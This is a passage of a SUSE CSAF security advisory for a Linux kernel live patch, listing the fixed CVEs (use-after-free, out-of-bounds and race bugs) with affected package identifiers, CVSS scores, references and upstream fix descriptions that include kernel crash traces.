| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
49 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 31 for SUSE Linux Enterprise 15 SP5)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 5.14.21-150500.55.124 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2022-50697: mrp: introduce active flags to prevent UAF when applicant uninit (bsc#1255595).\n- CVE-2023-53781: smc: Fix use-after-free in tcp_write_timer_handler() (bsc#1254755).\n- CVE-2025-21738: ata: libata-sff: ensure that we cannot write outside the allocated buffer (bsc#1257118).\n- CVE-2025-38159: wifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds (bsc#1257629).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1047,SUSE-2026-1048,SUSE-2026-1050,SUSE-2026-1054,SUSE-2026-1055,SUSE-SLE-Module-Live-Patching-15-SP4-2026-1047,SUSE-SLE-Module-Live-Patching-15-SP5-2026-1050",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1048-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1048-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261048-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1048-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024934.html"
},
{
"category": "self",
"summary": "SUSE Bug 1254755",
"url": "https://bugzilla.suse.com/1254755"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255595",
"url": "https://bugzilla.suse.com/1255595"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257118",
"url": "https://bugzilla.suse.com/1257118"
},
{
"category": "self",
"summary": "SUSE Bug 1257629",
"url": "https://bugzilla.suse.com/1257629"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-50697 page",
"url": "https://www.suse.com/security/cve/CVE-2022-50697/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53781 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53781/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21738 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21738/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38159 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38159/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 31 for SUSE Linux Enterprise 15 SP5)",
"tracking": {
"current_release_date": "2026-03-26T04:34:10Z",
"generator": {
"date": "2026-03-26T04:34:10Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1048-1",
"initial_release_date": "2026-03-26T04:34:10Z",
"revision_history": [
{
"date": "2026-03-26T04:34:10Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"product_id": "kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150400_24_184-default-3-150400.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-5_14_21-150400_24_184-default-3-150400.2.1.ppc64le",
"product_id": "kernel-livepatch-5_14_21-150400_24_184-default-3-150400.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"product_id": "kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_127-default-3-150500.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_127-default-3-150500.2.1.ppc64le",
"product_id": "kernel-livepatch-5_14_21-150500_55_127-default-3-150500.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_130-default-3-150500.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_130-default-3-150500.2.1.ppc64le",
"product_id": "kernel-livepatch-5_14_21-150500_55_130-default-3-150500.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"product": {
"name": "kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"product_id": "kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150400_24_184-default-3-150400.2.1.s390x",
"product": {
"name": "kernel-livepatch-5_14_21-150400_24_184-default-3-150400.2.1.s390x",
"product_id": "kernel-livepatch-5_14_21-150400_24_184-default-3-150400.2.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"product_id": "kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_127-default-3-150500.2.1.s390x",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_127-default-3-150500.2.1.s390x",
"product_id": "kernel-livepatch-5_14_21-150500_55_127-default-3-150500.2.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_130-default-3-150500.2.1.s390x",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_130-default-3-150500.2.1.s390x",
"product_id": "kernel-livepatch-5_14_21-150500_55_130-default-3-150500.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"product": {
"name": "kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"product_id": "kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150400_24_184-default-3-150400.2.1.x86_64",
"product": {
"name": "kernel-livepatch-5_14_21-150400_24_184-default-3-150400.2.1.x86_64",
"product_id": "kernel-livepatch-5_14_21-150400_24_184-default-3-150400.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64",
"product_id": "kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_127-default-3-150500.2.1.x86_64",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_127-default-3-150500.2.1.x86_64",
"product_id": "kernel-livepatch-5_14_21-150500_55_127-default-3-150500.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_130-default-3-150500.2.1.x86_64",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_130-default-3-150500.2.1.x86_64",
"product_id": "kernel-livepatch-5_14_21-150500_55_130-default-3-150500.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP4",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP4",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp5"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP4",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP4",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x"
},
"product_reference": "kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP4",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64"
},
"product_reference": "kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x"
},
"product_reference": "kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
},
"product_reference": "kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-50697",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-50697"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmrp: introduce active flags to prevent UAF when applicant uninit\n\nThe caller of del_timer_sync must prevent restarting of the timer, If\nwe have no this synchronization, there is a small probability that the\ncancellation will not be successful.\n\nAnd syzbot report the fellowing crash:\n==================================================================\nBUG: KASAN: use-after-free in hlist_add_head include/linux/list.h:929 [inline]\nBUG: KASAN: use-after-free in enqueue_timer+0x18/0xa4 kernel/time/timer.c:605\nWrite at addr f9ff000024df6058 by task syz-fuzzer/2256\nPointer tag: [f9], memory tag: [fe]\n\nCPU: 1 PID: 2256 Comm: syz-fuzzer Not tainted 6.1.0-rc5-syzkaller-00008-\nge01d50cbd6ee #0\nHardware name: linux,dummy-virt (DT)\nCall trace:\n dump_backtrace.part.0+0xe0/0xf0 arch/arm64/kernel/stacktrace.c:156\n dump_backtrace arch/arm64/kernel/stacktrace.c:162 [inline]\n show_stack+0x18/0x40 arch/arm64/kernel/stacktrace.c:163\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x68/0x84 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:284 [inline]\n print_report+0x1a8/0x4a0 mm/kasan/report.c:395\n kasan_report+0x94/0xb4 mm/kasan/report.c:495\n __do_kernel_fault+0x164/0x1e0 arch/arm64/mm/fault.c:320\n do_bad_area arch/arm64/mm/fault.c:473 [inline]\n do_tag_check_fault+0x78/0x8c arch/arm64/mm/fault.c:749\n do_mem_abort+0x44/0x94 arch/arm64/mm/fault.c:825\n el1_abort+0x40/0x60 arch/arm64/kernel/entry-common.c:367\n el1h_64_sync_handler+0xd8/0xe4 arch/arm64/kernel/entry-common.c:427\n el1h_64_sync+0x64/0x68 arch/arm64/kernel/entry.S:576\n hlist_add_head include/linux/list.h:929 [inline]\n enqueue_timer+0x18/0xa4 kernel/time/timer.c:605\n mod_timer+0x14/0x20 kernel/time/timer.c:1161\n mrp_periodic_timer_arm net/802/mrp.c:614 [inline]\n mrp_periodic_timer+0xa0/0xc0 net/802/mrp.c:627\n call_timer_fn.constprop.0+0x24/0x80 kernel/time/timer.c:1474\n expire_timers+0x98/0xc4 kernel/time/timer.c:1519\n\nTo fix it, we can introduce a new active flags to make sure the timer will\nnot restart.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-50697",
"url": "https://www.suse.com/security/cve/CVE-2022-50697"
},
{
"category": "external",
"summary": "SUSE Bug 1255594 for CVE-2022-50697",
"url": "https://bugzilla.suse.com/1255594"
},
{
"category": "external",
"summary": "SUSE Bug 1255595 for CVE-2022-50697",
"url": "https://bugzilla.suse.com/1255595"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T04:34:10Z",
"details": "important"
}
],
"title": "CVE-2022-50697"
},
{
"cve": "CVE-2023-53781",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53781"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc: Fix use-after-free in tcp_write_timer_handler().\n\nWith Eric\u0027s ref tracker, syzbot finally found a repro for\nuse-after-free in tcp_write_timer_handler() by kernel TCP\nsockets. [0]\n\nIf SMC creates a kernel socket in __smc_create(), the kernel\nsocket is supposed to be freed in smc_clcsock_release() by\ncalling sock_release() when we close() the parent SMC socket.\n\nHowever, at the end of smc_clcsock_release(), the kernel\nsocket\u0027s sk_state might not be TCP_CLOSE. This means that\nwe have not called inet_csk_destroy_sock() in __tcp_close()\nand have not stopped the TCP timers.\n\nThe kernel socket\u0027s TCP timers can be fired later, so we\nneed to hold a refcnt for net as we do for MPTCP subflows\nin mptcp_subflow_create_socket().\n\n[0]:\nleaked reference.\n sk_alloc (./include/net/net_namespace.h:335 net/core/sock.c:2108)\n inet_create (net/ipv4/af_inet.c:319 net/ipv4/af_inet.c:244)\n __sock_create (net/socket.c:1546)\n smc_create (net/smc/af_smc.c:3269 net/smc/af_smc.c:3284)\n __sock_create (net/socket.c:1546)\n __sys_socket (net/socket.c:1634 net/socket.c:1618 net/socket.c:1661)\n __x64_sys_socket (net/socket.c:1672)\n do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)\n entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120)\n==================================================================\nBUG: KASAN: slab-use-after-free in tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594)\nRead of size 1 at addr ffff888052b65e0d by task syzrepro/18091\n\nCPU: 0 PID: 18091 Comm: syzrepro Tainted: G W 6.3.0-rc4-01174-gb5d54eb5899a #7\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-1.amzn2022.0.1 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl (lib/dump_stack.c:107)\n print_report (mm/kasan/report.c:320 mm/kasan/report.c:430)\n kasan_report (mm/kasan/report.c:538)\n tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594)\n tcp_write_timer (./include/linux/spinlock.h:390 net/ipv4/tcp_timer.c:643)\n call_timer_fn (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/timer.h:127 kernel/time/timer.c:1701)\n __run_timers.part.0 (kernel/time/timer.c:1752 kernel/time/timer.c:2022)\n run_timer_softirq (kernel/time/timer.c:2037)\n __do_softirq (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/irq.h:142 kernel/softirq.c:572)\n __irq_exit_rcu (kernel/softirq.c:445 kernel/softirq.c:650)\n irq_exit_rcu (kernel/softirq.c:664)\n sysvec_apic_timer_interrupt (arch/x86/kernel/apic/apic.c:1107 (discriminator 14))\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53781",
"url": "https://www.suse.com/security/cve/CVE-2023-53781"
},
{
"category": "external",
"summary": "SUSE Bug 1254751 for CVE-2023-53781",
"url": "https://bugzilla.suse.com/1254751"
},
{
"category": "external",
"summary": "SUSE Bug 1254755 for CVE-2023-53781",
"url": "https://bugzilla.suse.com/1254755"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T04:34:10Z",
"details": "important"
}
],
"title": "CVE-2023-53781"
},
{
"cve": "CVE-2025-21738",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21738"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nata: libata-sff: Ensure that we cannot write outside the allocated buffer\n\nreveliofuzzing reported that a SCSI_IOCTL_SEND_COMMAND ioctl with out_len\nset to 0xd42, SCSI command set to ATA_16 PASS-THROUGH, ATA command set to\nATA_NOP, and protocol set to ATA_PROT_PIO, can cause ata_pio_sector() to\nwrite outside the allocated buffer, overwriting random memory.\n\nWhile a ATA device is supposed to abort a ATA_NOP command, there does seem\nto be a bug either in libata-sff or QEMU, where either this status is not\nset, or the status is cleared before read by ata_sff_hsm_move().\nAnyway, that is most likely a separate bug.\n\nLooking at __atapi_pio_bytes(), it already has a safety check to ensure\nthat __atapi_pio_bytes() cannot write outside the allocated buffer.\n\nAdd a similar check to ata_pio_sector(), such that also ata_pio_sector()\ncannot write outside the allocated buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21738",
"url": "https://www.suse.com/security/cve/CVE-2025-21738"
},
{
"category": "external",
"summary": "SUSE Bug 1238917 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1238917"
},
{
"category": "external",
"summary": "SUSE Bug 1257118 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1257118"
}
],
"remediations": [
{
"category": "vendor_fix",
